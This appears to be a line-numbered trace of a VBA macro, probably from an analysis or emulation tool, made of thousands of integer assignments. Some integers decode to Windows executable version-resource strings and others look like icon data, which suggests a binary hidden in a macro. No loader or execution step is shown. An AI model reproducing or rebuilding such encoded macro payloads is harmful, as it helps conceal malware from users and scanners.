
                            3466

                            Y = 336

                            3467

                            For I = 1 To 3

                            3468

                            Y = 0

                            3469

                            Next

                            3470

                            Y = 65536

                            3471

                            Y = 0

                            3472

                            Y = 352

                            3473

                            For I = 1 To 3

                            3474

                            Y = 0

                            3475

                            Next

                            3476

                            Y = 65536

                            3477

                            Y = 0

                            3478

                            Y = 368

                            3479

                            For I = 1 To 3

                            3480

                            Y = 0

                            3481

                            Next

                            3482

                            Y = 65536

                            3483

                            Y = 0

                            3484

                            Y = 384

                            3485

                            Y = 33952

                            3486

                            Y = 9640

                            3487

                            For I = 1 To 2

                            3488

                            Y = 0

                            3489

                            Next

                            3490

                            Y = 43592

                            3491

                            Y = 4264

                            3492

                            For I = 1 To 2

                            3493

                            Y = 0

                            3494

                            Next

                            3495

                            Y = 47856

                            3496

                            Y = 1128

                            3497

                            For I = 1 To 2

                            3498

                            Y = 0

                            3499

                            Next

                            3500

                            Y = 48984

                            3501

                            Y = 48

                            3502

                            For I = 1 To 2

                            3503

                            Y = 0

                            3504

                            Next

                            3505

                            Y = 33168

                            3506

                            Y = 780

                            3507

                            For I = 1 To 2

                            3508

                            Y = 0

                            3509

                            Next

                            3510

                            Y = 49032

                            3511

                            Y = 3366

                            3512

                            For I = 1 To 2

                            3513

                            Y = 0

                            3514

                            Next

                            3515

                            Y = 3408652

                            3516

                            Y = 5636096

                            3517

                            Y = 6226003

                            3518

                            Y = 4522070

                            3519

                            Y = 5439570

                            3520

                            Y = 5177417

                            3521

                            Y = 6225998

                            3522

                            Y = 5111881

                            3523

                            Y = 5177414

                            3524

                            Y = 0

                            3525

                            Y = - 17890115

                            3526

                            For I = 1 To 2

                            3527

                            Y = 65536

                            3528

                            Next

                            3529

                            Y = 0

                            3530

                            Y = 65536

                            3531

                            Y = 0

                            3532

                            Y = 63

                            3533

                            Y = 0

                            3534

                            Y = 4

                            3535

                            Y = 1

                            3536

                            For I = 1 To 3

                            3537

                            Y = 0

                            3538

                            Next

                            3539

                            Y = 68

                            3540

                            Y = 5636097

                            3541

                            Y = 7471201

                            3542

                            Y = 6881350

                            3543

                            Y = 6619244

                            3544

                            Y = 7209033

                            3545

                            Y = 7274598

                            3546

                            Y = 0

                            3547

                            Y = 262180

                            3548

                            Y = 5505024

                            3549

                            Y = 6357106

                            3550

                            Y = 7536750

                            3551

                            Y = 6357100

                            3552

                            Y = 6881396

                            3553

                            Y = 7209071

                            3554

                            Y = 0

                            3555

                            Y = 78643200

                            3556

                            Y = 620

                            3557

                            Y = 5439489

                            3558

                            Y = 7471220

                            3559

                            Y = 7209065

                            3560

                            Y = 4587623

                            3561

                            Y = 7077993

                            3562

                            Y = 4784229

                            3563

                            Y = 6684782

                            3564

                            Y = 111

                            3565

                            Y = 584

                            3566

                            Y = 3145729

                            3567

                            For I = 1 To 2

                            3568

                            Y = 3145776

                            3569

                            Next

                            3570

                            Y = 6422580

                            3571

                            Y = 48

                            3572

                            Y = 1572936

                            3573

                            Y = 4390913

                            3574

                            Y = 7143535

                            3575

                            Y = 6619245

                            3576

                            Y = 7602286

                            3577

                            Y = 115

                            3578

                            Y = 7274563

                            3579

                            Y = 7602286

                            3580

                            Y = 7274610

                            3581

                            Y = 2097260

                            3582

                            Y = 6357104

                            3583

                            Y = 6619246

                            3584

                            Y = 2097260

                            3585

                            Y = 7274595

                            3586

                            Y = 7340141

                            3587

                            Y = 7209071

                            3588

                            Y = 7209061

                            3589

                            Y = 116

                            3590

                            Y = 1441868

                            3591

                            Y = 4390913

                            3592

                            Y = 7143535

                            3593

                            Y = 6357104

                            3594

                            Y = 7929966

                            3595

                            Y = 6357070

                            3596

                            Y = 6619245

                            3597

                            Y = 0

                            3598

                            Y = 6881357

                            3599

                            Y = 7471203

                            3600

                            Y = 7536751

                            3601

                            Y = 6684783

                            3602

                            Y = 2097268

                            3603

                            Y = 7274563

                            3604

                            Y = 7340146

                            3605

                            Y = 7471215

                            3606

                            Y = 7602273

                            3607

                            Y = 7274601

                            3608

                            Y = 110

                            3609

                            Y = 1572952

                            3610

                            Y = 4587521

                            3611

                            Y = 7077993

                            3612

                            Y = 4456549

                            3613

                            Y = 7536741

                            3614

                            Y = 7471203

                            3615

                            Y = 7340137

                            3616

                            Y = 6881396

                            3617

                            Y = 7209071

                            3618

                            Y = 0

                            3619

                            Y = 7274563

                            3620

                            Y = 7602286

                            3621

                            Y = 7274610

                            3622

                            Y = 2097260

                            3623

                            Y = 6357104

                            3624

                            Y = 6619246

                            3625

                            Y = 2097260

                            3626

                            Y = 7274595

                            3627

                            Y = 7340141

                            3628

                            Y = 7209071

                            3629

                            Y = 7209061

                            3630

                            Y = 116

                            3631

                            Y = 524336

                            3632

                            Y = 4587521

                            3633

                            Y = 7077993

                            3634

                            Y = 5636197

                            3635

                            Y = 7471205

                            3636

                            Y = 6881395

                            3637

                            Y = 7209071

                            3638

                            Y = 0

                            3639

                            Y = 3014705

                            3640

                            For I = 1 To 2

                            3641

                            Y = 3014704

                            3642

                            Next

                            3643

                            Y = 48

                            3644

                            Y = 917564

                            3645

                            Y = 4784129

                            3646

                            Y = 7602286

                            3647

                            Y = 7471205

                            3648

                            Y = 6357102

                            3649

                            Y = 5111916

                            3650

                            Y = 7143521

                            3651

                            Y = 101

                            3652

                            Y = 7602275

                            3653

                            Y = 7078002

                            3654

                            Y = 6357104

                            3655

                            Y = 6619246

                            3656

                            Y = 3014764

                            3657

                            Y = 7864421

                            3658

                            Y = 101

                            3659

                            Y = 131112

                            3660

                            Y = 4980737

                            3661

                            Y = 6750309

                            3662

                            Y = 7077985

                            3663

                            Y = 7274563

                            3664

                            Y = 7929968

                            3665

                            Y = 6881394

                            3666

                            Y = 6815847

                            3667

                            Y = 116

                            3668

                            Y = 32

                            3669

                            Y = 917572

                            3670

                            Y = 5177345

                            3671

                            Y = 6881394

                            3672

                            Y = 6881383

                            3673

                            Y = 6357102

                            3674

                            Y = 4587628

                            3675

                            Y = 7077993

                            3676

                            Y = 7209061

                            3677

                            Y = 7143521

                            3678

                            Y = 101

                            3679

                            Y = 7602275

                            3680

                            Y = 7078002

                            3681

                            Y = 6357104

                            3682

                            Y = 6619246

                            3683

                            Y = 3014764

                            3684

                            Y = 7864421

                            3685

                            Y = 101

                            3686

                            Y = 524340

                            3687

                            Y = 5242881

                            3688

                            Y = 7274610

                            3689

                            Y = 7667812

                            3690

                            Y = 7602275

                            3691

                            Y = 6619222

                            3692

                            Y = 7536754

                            3693

                            Y = 7274601

                            3694

                            Y = 110

                            3695

                            Y = 3014705

                            3696

                            For I = 1 To 2

                            3697

                            Y = 3014704

                            3698

                            Next

                            3699

                            Y = 48

                            3700

                            Y = 524344

                            3701

                            Y = 4259841

                            3702

                            Y = 7536755

                            3703

                            Y = 7143525

                            3704

                            Y = 7077986

                            3705

                            Y = 2097273

                            3706

                            Y = 6619222

                            3707

                            Y = 7536754

                            3708

                            Y = 7274601

                            3709

                            Y = 110

                            3710

                            Y = 3014705

                            3711

                            For I = 1 To 2

                            3712

                            Y = 3014704

                            3713

                            Next

                            3714

                            Y = 48

                            3715

                            Y = 0

                            3716

                            Y = 40

                            3717

                            Y = 48

                            3718

                            Y = 96

                            3719

                            Y = 2097153

                            3720

                            Y = 0

                            3721

                            Y = 9600

                            3722

                            For I = 1 To 25

                            3723

                            Y = 0

                            3724

                            Next

                            3725

                            Y = 20001073

                            3726

                            Y = 70332721

                            3727

                            For I = 1 To 2

                            3728

                            Y = 103887153

                            3729

                            Next

                            3730

                            Y = 70332721

                            3731

                            Y = 20066866

                            3732

                            For I = 1 To 3

                            3733

                            Y = 0

                            3734

                            Next

                            3735

                            Y = 20001073

                            3736

                            Y = 36778289

                            3737

                            Y = 70332721

                            3738

                            Y = 53555505

                            3739

                            Y = 36844082

                            3740

                            Y = 20066866

                            3741

                            For I = 1 To 32

                            3742

                            Y = 0

                            3743

                            Next

                            3744

                            Y = 36778289

                            3745

                            Y = 170996017

                            3746

                            Y = 405877041

                            3747

                            Y = 590426417

                            3748

                            Y = 607203633

                            3749

                            Y = 456208689

                            3750

                            Y = 238104881

                            3751

                            Y = 87109937

                            3752

                            Y = 20001073

                            3753

                            End Sub

                            LineInstructionMeta Information
                            5313

                            Private Sub CheckHash5()

                            5314

                            For I = 1 To 213

                            executed
                            5315

                            Y = 0

                            5316

                            Next

                            5317

                            Y = 486080511

                            5318

                            Y = 65295

                            5319

                            Y = 15794175

                            5320

                            Y = 65287

                            5321

                            Y = 64767

                            5322

                            Y = 3843

                            5323

                            Y = 63743

                            5324

                            Y = 768

                            5325

                            Y = 57599

                            5326

                            Y = 256

                            5327

                            Y = 49407

                            5328

                            Y = 256

                            5329

                            Y = 33023

                            5330

                            Y = 256

                            5331

                            Y = 33023

                            5332

                            Y = 0

                            5333

                            Y = 33023

                            5334

                            Y = 0

                            5335

                            Y = 33023

                            5336

                            Y = 0

                            5337

                            Y = 33023

                            5338

                            Y = 256

                            5339

                            Y = 240

                            5340

                            Y = 7936

                            5341

                            Y = 240

                            5342

                            Y = 7936

                            5343

                            Y = 224

                            5344

                            Y = 7936

                            5345

                            Y = 224

                            5346

                            Y = 7936

                            5347

                            Y = 224

                            5348

                            Y = 7936

                            5349

                            Y = 224

                            5350

                            Y = 16128

                            5351

                            Y = - 532741904

                            5352

                            Y = 32512

                            5353

                            Y = - 260112136

                            5354

                            Y = 32512

                            5355

                            Y = - 125894432

                            5356

                            Y = 1792

                            5357

                            Y = - 117505856

                            5358

                            Y = 1792

                            5359

                            Y = - 117505856

                            5360

                            Y = 1792

                            5361

                            Y = - 50396992

                            5362

                            Y = 1792

                            5363

                            Y = - 50396992

                            5364

                            Y = 1792

                            5365

                            Y = - 117505856

                            5366

                            Y = 1792

                            5367

                            Y = - 117505856

                            5368

                            Y = 1792

                            5369

                            Y = - 125894432

                            5370

                            Y = 1792

                            5371

                            Y = - 260112136

                            5372

                            Y = 32512

                            5373

                            Y = - 532741904

                            5374

                            Y = 32512

                            5375

                            Y = - 1071709984

                            5376

                            Y = 16128

                            5377

                            Y = - 2146500384

                            5378

                            Y = 7936

                            5379

                            Y = 131296

                            5380

                            Y = 7936

                            5381

                            Y = 224

                            5382

                            Y = 7936

                            5383

                            Y = 240

                            5384

                            Y = 7936

                            5385

                            Y = 240

                            5386

                            Y = 7936

                            5387

                            Y = 33023

                            5388

                            Y = 16128

                            5389

                            Y = 33023

                            5390

                            Y = 32512

                            5391

                            Y = 33023

                            5392

                            Y = 65295

                            5393

                            Y = 33023

                            5394

                            Y = 65287

                            5395

                            Y = 33023

                            5396

                            Y = 65287

                            5397

                            Y = 33023

                            5398

                            Y = 65287

                            5399

                            Y = 57599

                            5400

                            Y = 65295

                            5401

                            Y = 8454143

                            5402

                            Y = 65343

                            5403

                            Y = 532742143

                            5404

                            Y = 65535

                            5405

                            Y = - 1

                            5406

                            Y = 65535

                            5407

                            Y = - 1

                            5408

                            Y = 65535

                            5409

                            Y = - 1

                            5410

                            Y = 65535

                            5411

                            Y = - 1

                            5412

                            Y = 65535

                            5413

                            Y = 40

                            5414

                            Y = 32

                            5415

                            Y = 64

                            5416

                            Y = 2097153

                            5417

                            Y = 0

                            5418

                            Y = 4224

                            5419

                            For I = 1 To 18

                            5420

                            Y = 0

                            5421

                            Next

                            5422

                            Y = 106124118

                            5423

                            Y = 240342102

                            5424

                            Y = 240407895

                            5425

                            Y = 122967383

                            5426

                            Y = 23290984

                            5427

                            Y = 0

                            5428

                            Y = 71517254

                            5429

                            Y = 155205955

                            5430

                            Y = 155140162

                            5431

                            Y = 88031297

                            5432

                            For I = 1 To 18

                            5433

                            Y = 0

                            5434

                            Next

                            5435

                            Y = 57569395

                            5436

                            Y = 88623434

                            5437

                            Y = 289950026

                            5438

                            Y = 658982729

                            5439

                            Y = 1227697453

                            5440

                            Y = 1697196329

                            5441

                            Y = 1646798888

                            5442

                            Y = 992684843

                            5443

                            Y = 289621061

                            5444

                            Y = 188760129

                            5445

                            Y = 523317553

                            5446

                            Y = 925970737

                            5447

                            Y = 909193521

                            5448

                            Y = 607203633

                            5449

                            Y = 138033980

                            5450

                            For I = 1 To 2

                            5451

                            Y = 0

                            5452

                            Next

                            5453

                            Y = 20001075

                            5454

                            Y = 19869487

                            5455

                            For I = 1 To 11

                            5456

                            Y = 0

                            5457

                            Next

                            5458

                            Y = 90663019

                            5459

                            Y = 205734724

                            5460

                            Y = 841953071

                            5461

                            Y = 1278226480

                            5462

                            Y = - 1788714138

                            5463

                            Y = - 206063166

                            5464

                            Y = - 21842756

                            5465

                            Y = - 27369629

                            5466

                            Y = - 63029182

                            5467

                            Y = - 1154469582

                            5468

                            Y = 1798649141

                            5469

                            Y = 1849704513

                            5470

                            Y = 2117021487

                            5471

                            Y = - 1624297680

                            5472

                            Y = - 1926353362

                            5473

                            Y = 1798320176

                            5474

                            Y = 741421361

                            5475

                            Y = 288633909

                            5476

                            Y = 254882098

                            5477

                            Y = 338768177

                            5478

                            Y = 355545393

                            5479

                            Y = 204418863

                            5480

                            Y = 53358126

                            5481

                            For I = 1 To 7

                            5482

                            Y = 0

                            5483

                            Next

                            5484

                            Y = 40791922

                            5485

                            Y = 407522124

                            5486

                            Y = 1449025377

                            5487

                            Y = 1379482170

                            5488

                            Y = - 1808781262

                            5489

                            Y = - 1406128079

                            5490

                            Y = - 528185974

                            5491

                            Y = - 4210230

                            5492

                            Y = - 4341560

                            5493

                            Y = - 9605261

                            5494

                            Y = - 12631996

                            5495

                            Y = - 634112970

                            5496

                            Y = - 1051042978

                            5497

                            Y = - 426337888

                            5498

                            Y = - 496407953

                            5499

                            Y = - 280738230

                            5500

                            Y = - 801621700

                            5501

                            Y = - 1909641938

                            5502

                            Y = 1378889776

                            5503

                            Y = 993079601

                            5504

                            Y = 909127728

                            5505

                            Y = 976236592

                            5506

                            Y = 925970737

                            5507

                            Y = 640758065

                            5508

                            Y = 187641648

                            5509

                            Y = 19737901

                            5510

                            For I = 1 To 6

                            5511

                            Y = 0

                            5512

                            Next

                            5513

                            Y = 809846086

                            5514

                            Y = - 1315267424

                            5515

                            Y = - 3552046

                            5516

                            Y = - 124348001

                            5517

                            Y = - 11512998

                            5518

                            Y = - 230472376

                            5519

                            Y = - 123427156

                            5520

                            Y = - 4078388

                            5521

                            Y = - 4144437

                            5522

                            Y = - 7236711

                            5523

                            Y = - 10855326

                            5524

                            Y = - 229090721

                            5525

                            Y = - 71977025

                            5526

                            Y = - 4670525

                            5527

                            Y = - 4999490

                            5528

                            Y = - 9144192

                            5529

                            Y = - 44606362

                            5530

                            Y = - 1573636550

                            5531

                            Y = 1194274607

                            5532

                            Y = 1177628977

                            5533

                            Y = 1211183409

                            5534

                            Y = 1194406193

                            5535

                            Y = 1043411249

                            5536

                            Y = 724644145

                            5537

                            Y = 221393459

                            5538

                            Y = 37041462

                            5539

                            For I = 1 To 6

                            5540

                            Y = 0

                            5541

                            Next

                            5542

                            Y = 1213354836

                            5543

                            Y = - 541410112

                            5544

                            Y = - 3420461

                            5545

                            Y = - 3749425

                            5546

                            Y = - 6775904

                            5547

                            Y = - 22960983

                            5548

                            Y = - 20921142

                            5549

                            Y = - 3946802

                            5550

                            Y = - 4078388

                            5551

                            Y = - 4538940

                            5552

                            Y = - 5657421

                            5553

                            Y = - 22237513

                            5554

                            Y = - 4407609

                            5555

                            Y = - 4538939

                            5556

                            Y = - 5854799

                            5557

                            Y = - 10789016

                            5558

                            Y = - 246985640

                            5559

                            Y = 1797004833

                            5560

                            Y = 405811248

                            5561

                            Y = 523317553

                            5562

                            Y = 691089713

                            5563

                            Y = 758198577

                            5564

                            Y = 691089713

                            5565

                            Y = 489763121

                            5566

                            Y = 187970613

                            5567

                            Y = 54082107

                            5568

                            For I = 1 To 6

                            5569

                            Y = 0

                            5570

                            Next

                            5571

                            Y = 609506646

                            5572

                            Y = - 1029528408

                            5573

                            Y = - 3223339

                            5574

                            Y = - 3354668

                            5575

                            Y = - 3749425

                            5576

                            Y = - 4276025

                            5577

                            Y = - 4867905

                            5578

                            Y = - 5262407

                            5579

                            Y = - 5657422

                            5580

                            Y = - 6117716

                            5581

                            For I = 1 To 2

                            5582

                            Y = - 6644058

                            5583

                            Next

                            5584

                            Y = - 5393991

                            5585

                            Y = - 4538938

                            5586

                            Y = - 7302245

                            5587

                            Y = - 14078407

                            5588

                            Y = - 686219736

                            5589

                            Y = 1141574669

                            5590

                            Y = 374494038

                            5591

                            Y = 322912579

                            5592

                            Y = 421535776

                            5593

                            Y = 287647013

                            5594

                            Y = 221854266

                            5595

                            Y = 171456569

                            5596

                            Y = 71254081

                            5597

                            Y = 20527418

                            5598

                            For I = 1 To 3

                            5599

                            Y = 0

                            5600

                            Next

                            5601

                            Y = 141323630

                            5602

                            Y = 458643288

                            5603

                            Y = 424365133

                            5604

                            Y = 1010515005

                            5605

                            Y = - 1181707884

                            5606

                            Y = - 3157289

                            5607

                            Y = - 3749425

                            5608

                            Y = - 4538685

                            5609

                            Y = - 3881012

                            5610

                            Y = - 3420461

                            5611

                            Y = - 3091497

                            5612

                            Y = - 2828581

                            5613

                            Y = - 2960167

                            5614

                            Y = - 3552304

                            5615

                            Y = - 4670528

                            5616

                            Y = - 7367781

                            5617

                            Y = - 6775643

                            5618

                            Y = - 5591370

                            5619

                            Y = - 11447204

                            5620

                            Y = - 231459009

                            5621

                            Y = - 1135257764

                            5622

                            Y = - 1216643710

                            5623

                            Y = - 1490145228

                            5624

                            Y = - 1390337238

                            5625

                            Y = 1057754382

                            5626

                            Y = 38489167

                            5627

                            Y = 21382728

                            5628

                            For I = 1 To 4

                            5629

                            Y = 0

                            5630

                            Next

                            5631

                            Y = 141718645

                            5632

                            Y = 1566729060

                            5633

                            Y = - 389428530

                            5634

                            Y = - 845834343

                            5635

                            Y = - 74542956

                            5636

                            Y = - 37040943

                            5637

                            Y = - 3749683

                            5638

                            Y = - 4209977

                            5639

                            Y = - 3157546

                            5640

                            Y = - 3815476

                            5641

                            Y = - 23224412

                            5642

                            Y = - 176653698

                            5643

                            Y = - 714972314

                            5644

                            Y = - 864125054

                            5645

                            Y = - 508053317

                            5646

                            Y = - 103294499

                            5647

                            Y = - 2894375

                            5648

                            Y = - 6051923

                            5649

                            Y = - 7170401

                            5650

                            Y = - 5065539

                            5651

                            Y = - 4407352

                            5652

                            Y = - 4473402

                            5653

                            Y = - 4604732

                            5654

                            Y = - 8025970

                            5655

                            Y = - 9538953

                            5656

                            Y = - 1235986598

                            5657

                            Y = 253237273

                            5658

                            For I = 1 To 5

                            5659

                            Y = 0

                            5660

                            Next

                            5661

                            Y = 461406594

                            5662

                            Y = - 1247434839

                            5663

                            Y = - 2499361

                            5664

                            Y = - 2565410

                            5665

                            Y = - 2696739

                            5666

                            Y = - 3157290

                            5667

                            Y = - 4144185

                            5668

                            Y = - 2960167

                            5669

                            Y = - 5131079

                            5670

                            Y = - 7301991

                            5671

                            Y = - 1050647449

                            5672

                            Y = 1899181366

                            5673

                            Y = 1227829040

                            5674

                            Y = 1043279663

                            5675

                            Y = 1413760325

                            5676

                            Y = - 1736014200

                            5677

                            Y = - 119676958

                            5678

                            Y = - 2368032

                            5679

                            Y = - 6907230

                            5680

                            Y = - 6578521

                            5681

                            Y = - 4275767

                            5682

                            Y = - 4341816

                            5683

                            Y = - 4473145

                            5684

                            Y = - 5131333

                            5685

                            Y = - 4999494

                            5686

                            Y = - 290343752

                            5687

                            Y = 404429596

                            5688

                            For I = 1 To 5

                            5689

                            Y = 0

                            5690

                            Next

                            5691

                            Y = 445484688

                            5692

                            Y = - 1718183783

                            5693

                            Y = - 69542689

                            5694

                            Y = - 2433568

                            5695

                            Y = - 2696996

                            5696

                            Y = - 4078392

                            5697

                            Y = - 3420462

                            5698

                            Y = - 5065287

                            5699

                            Y = - 141453412

                            5700

                            Y = - 1571201696

                            5701

                            Y = 372783418

                            5702

                            Y = 189549902

                            5703

                            Y = 273699155

                            5704

                            Y = 223433299

                            5705

                            Y = 139744598

                            5706

                            Y = 257185111

                            5707

                            Y = 1920695420

                            5708

                            Y = - 337978402

                            5709

                            Y = - 2959912

                            5710

                            Y = - 7696745

                            5711

                            Y = - 4999490

                            5712

                            Y = - 4209974

                            5713

                            Y = - 5920850

                            5714

                            Y = - 7302249

                            5715

                            Y = - 712866424

                            5716

                            Y = 1377639967

                            5717

                            Y = 87504955

                            5718

                            For I = 1 To 5

                            5719

                            Y = 0

                            5720

                            Next

                            5721

                            Y = 77373088

                            5722

                            Y = 660167258

                            5723

                            Y = - 1146968922

                            5724

                            Y = - 69542432

                            5725

                            Y = - 3025705

                            5726

                            Y = - 3749170

                            5727

                            Y = - 4670785

                            5728

                            Y = - 5460043

                            5729

                            Y = - 982946703

                            5730

                            Y = 726421072

                            5731

                            Y = 26383769

                            5732

                            Y = 26120597

                            5733

                            Y = 42765970

                            5734

                            Y = 26120340

                            5735

                            For I = 1 To 2

                            5736

                            Y = 0

                            5737

                            Next

                            5738

                            Y = 443116140

                            5739

                            Y = - 1549227606

                            5740

                            Y = - 1578774

                            5741

                            Y = - 5262664

                            5742

                            Y = - 6973022

                            5743

                            Y = - 4802368

                            5744

                            Y = - 10131346

                            5745

                            Y = - 77174416

                            5746

                            Y = 1545017368

                            5747

                            Y = 171193399

                            5748

                            For I = 1 To 6

                            5749

                            Y = 0

                            5750

                            Next

                            5751

                            Y = 27172769

                            5752

                            Y = 209945990

                            5753

                            Y = - 1904772999

                            5754

                            Y = - 69410847

                            5755

                            For I = 1 To 2

                            5756

                            Y = - 3486255

                            5757

                            Next

                            5758

                            Y = - 8552313

                            5759

                            Y = - 42961540

                            5760

                            Y = 1277042466

                            5761

                            Y = 74543990

                            5762

                            For I = 1 To 6

                            5763

                            Y = 0

                            5764

                            Next

                            5765

                            Y = 27041699

                            5766

                            Y = 762278002

                            5767

                            Y = - 185733650

                            5768

                            Y = - 2631203

                            5769

                            Y = - 7499366

                            5770

                            Y = - 4670269

                            5771

                            Y = - 12894907

                            5772

                            Y = - 13750213

                            5773

                            Y = 1561070863

                            5774

                            Y = 288831546

                            5775

                            Y = 89083988

                            5776

                            Y = 23225448

                            5777

                            For I = 1 To 3

                            5778

                            Y = 0

                            5779

                            Next

                            5780

                            Y = 91452533

                            5781

                            Y = 777607770

                            5782

                            Y = 1717987175

                            5783

                            Y = - 810372171

                            5784

                            Y = - 2038811

                            5785

                            Y = - 3617841

                            5786

                            Y = - 4868165

                            5787

                            Y = - 12038571

                            5788

                            Y = - 365610174

                            5789

                            Y = 456208947

                            5790

                            For I = 1 To 8

                            5791

                            Y = 0

                            5792

                            Next

                            5793

                            Y = 240605273

                            5794

                            Y = - 706945570

                            5795

                            Y = - 1447188

                            5796

                            Y = - 7235938

                            5797

                            Y = - 5065284

                            5798

                            Y = - 7302246

                            5799

                            Y = - 9802380

                            5800

                            Y = - 699839664

                            5801

                            Y = - 1573899978

                            5802

                            Y = 1646141475

                            5803

                            Y = 488579105

                            5804

                            For I = 1 To 3

                            5805

                            Y = 0

                            5806

                            Next

                            5807

                            Y = 542792539

                            5808

                            Y = - 236854300

                            5809

                            Y = - 1709847

                            5810

                            Y = - 1775896

                            5811

                            Y = - 1841689

                            5812

                            Y = - 3815220

                            5813

                            Y = - 4538944

                            5814

                            Y = - 10459282

                            5815

                            Y = - 1219801260

                            5816

                            Y = 204484914

                            5817

                            For I = 1 To 8

                            5818

                            Y = 0

                            5819

                            Next

                            5820

                            Y = 27501994

                            5821

                            Y = - 1733316689

                            5822

                            Y = - 328966

                            5823

                            Y = - 7104609

                            5824

                            Y = - 5525578

                            5825

                            Y = - 3749168

                            5826

                            Y = - 3880754

                            5827

                            Y = - 3946802

                            5828

                            Y = - 6973026

                            5829

                            Y = - 7104354

                            5830

                            Y = 2016490036

                            5831

                            For I = 1 To 3

                            5832

                            Y = 0

                            5833

                            Next

                            5834

                            Y = 677075803

                            5835

                            Y = - 1446932

                            5836

                            Y = - 1578261

                            5837

                            Y = - 1644310

                            5838

                            Y = - 1710103

                            5839

                            Y = - 3683634

                            5840

                            Y = - 4275772

                            5841

                            Y = - 6314581

                            5842

                            Y = - 1352440214

                            5843

                            Y = 170930482

                            5844

                            For I = 1 To 9

                            5845

                            Y = 0

                            5846

                            Next

                            5847

                            Y = - 2020503151

                            5848

                            Y = - 197380

                            5849

                            Y = - 6841438

                            5850

                            Y = - 5394249

                            5851

                            Y = - 3552303

                            5852

                            Y = - 3683632

                            5853

                            Y = - 3814961

                            5854

                            Y = - 7038820

                            5855

                            Y = - 7038561

                            5856

                            Y = 2133930805

                            5857

                            For I = 1 To 3

                            5858

                            Y = 0

                            5859

                            Next

                            5860

                            Y = 375086172

                            5861

                            Y = - 1280462929

                            5862

                            Y = - 657929781

                            5863

                            Y = - 170008608

                            5864

                            Y = - 1578518

                            5865

                            Y = - 3552049

                            5866

                            Y = - 4407357

                            5867

                            Y = - 5788750

                            5868

                            Y = - 914719102

                            5869

                            Y = 271725364

                            5870

                            For I = 1 To 8

                            5871

                            Y = 0

                            5872

                            Next

                            5873

                            Y = 93558168

                            5874

                            Y = - 1464091717

                            5875

                            Y = - 789259

                            5876

                            Y = - 6775645

                            5877

                            Y = - 5130821

                            5878

                            Y = - 3617840

                            5879

                            Y = - 4407355

                            5880

                            Y = - 38553668

                            5881

                            Y = - 208825963

                            5882

                            Y = - 662731896

                            5883

                            Y = 1546070058

                            5884

                            For I = 1 To 3

                            5885

                            Y = 0

                            5886

                            Next

                            5887

                            Y = 43358103

                            5888

                            Y = 443839862

                            5889

                            Y = 1095585358

                            5890

                            Y = - 1129797206

                            5891

                            Y = - 1446932

                            5892

                            Y = - 3157291

                            5893

                            Y = - 3815220

                            5894

                            Y = - 6775389

                            5895

                            Y = - 226129264

                            5896

                            Y = 540160820

                            5897

                            For I = 1 To 8

                            5898

                            Y = 0

                            5899

                            Next

                            5900

                            Y = 308043102

                            5901

                            Y = - 639770913

                            5902

                            Y = - 1644567

                            5903

                            Y = - 6380888

                            5904

                            Y = - 4341562

                            5905

                            Y = - 7762542

                            5906

                            Y = - 8551544

                            5907

                            Y = - 1303950515

                            5908

                            Y = 1764371245

                            5909

                            Y = 991698206

                            5910

                            Y = 288699960

                            5911

                            For I = 1 To 5

                            5912

                            Y = 0

                            5913

                            Next

                            5914

                            Y = 144087193

                            5915

                            Y = - 1971816327

                            5916

                            Y = - 85398805

                            5917

                            Y = - 2630948

                            5918

                            Y = - 2433825

                            5919

                            Y = - 7104355

                            5920

                            Y = - 8683384

                            5921

                            Y = 2065967147

                            5922

                            Y = 191260778

                            5923

                            For I = 1 To 6

                            5924

                            Y = 0

                            5925

                            Next

                            5926

                            Y = 94742185

                            5927

                            Y = 1333558398

                            5928

                            Y = - 68029966

                            5929

                            Y = - 3025962

                            5930

                            Y = - 5920337

                            5931

                            Y = - 3881012

                            5932

                            Y = - 12103336

                            5933

                            Y = - 45854632

                            5934

                            Y = 1107823116

                            5935

                            Y = 55924570

                            5936

                            For I = 1 To 6

                            5937

                            Y = 0

                            5938

                            Next

                            5939

                            Y = 110532504

                            5940

                            Y = 1012554330

                            5941

                            Y = - 657732147

                            5942

                            Y = - 34803986

                            5943

                            Y = - 1973019

                            5944

                            Y = - 3025706

                            5945

                            Y = - 4012600

                            5946

                            Y = - 8683642

                            5947

                            Y = - 699509927

                            5948

                            Y = 1076965940

                            5949

                            Y = 44082086

                            5950

                            For I = 1 To 5

                            5951

                            Y = 0

                            5952

                            Next

                            5953

                            Y = 627073121

                            5954

                            Y = - 1229408071

                            5955

                            Y = - 1447188

                            5956

                            Y = - 4473149

                            5957

                            Y = - 4670527

                            5958

                            Y = - 3354669

                            5959

                            Y = - 10064526

                            5960

                            Y = - 45131682

                            5961

                            Y = 2115772193

                            5962

                            Y = 287055134

                            5963

                            For I = 1 To 6

                            5964

                            Y = 0

                            5965

                            Next

                            5966

                            Y = 563912094

                            5967

                            Y = - 1060714296

                            5968

                            Y = - 920589

                            5969

                            Y = - 1052175

                            5970

                            Y = - 1183761

                            5971

                            Y = - 2762534

                            5972

                            Y = - 2367777

                            5973

                            Y = - 4078394

                            5974

                            Y = - 9604744

                            5975

                            Y = - 615887275

                            5976

                            Y = 1194735417

                            5977

                            Y = 191984500

                            5978

                            For I = 1 To 2

                            5979

                            Y = 0

                            5980

                            Next

                            5981

                            Y = 143297677

                            5982

                            Y = 710959201

                            5983

                            Y = - 1381455446

                            5984

                            Y = - 85267475

                            5985

                            Y = - 3223340

                            5986

                            Y = - 4867650

                            5987

                            For I = 1 To 2

                            5988

                            Y = - 2762789

                            5989

                            Next

                            5990

                            Y = - 3881013

                            5991

                            Y = - 8025715

                            5992

                            Y = - 178363286

                            5993

                            Y = - 1707919815

                            5994

                            Y = 220604200

                            5995

                            For I = 1 To 5

                            5996

                            Y = 0

                            5997

                            Next

                            5998

                            Y = 361138055

                            5999

                            Y = - 1515607382

                            6000

                            Y = - 789004

                            6001

                            Y = - 920589

                            6002

                            Y = - 986382

                            6003

                            Y = - 1381139

                            6004

                            Y = - 3091498

                            6005

                            Y = - 1841690

                            6006

                            Y = - 4078394

                            6007

                            Y = - 8157300

                            6008

                            Y = - 582332844

                            6009

                            Y = - 1657588422

                            6010

                            Y = 1179603026

                            6011

                            Y = 945116759

                            6012

                            Y = 1834769758

                            6013

                            Y = - 1095584844

                            6014

                            Y = - 68555796

                            6015

                            Y = - 2104861

                            6016

                            Y = - 4144183

                            6017

                            Y = - 3157291

                            6018

                            Y = - 2565154

                            6019

                            Y = - 2631203

                            6020

                            Y = - 2762532

                            6021

                            Y = - 4473151

                            6022

                            Y = - 8946556

                            6023

                            Y = - 311199873

                            6024

                            Y = 421733414

                            6025

                            For I = 1 To 5

                            6026

                            Y = 0

                            6027

                            Next

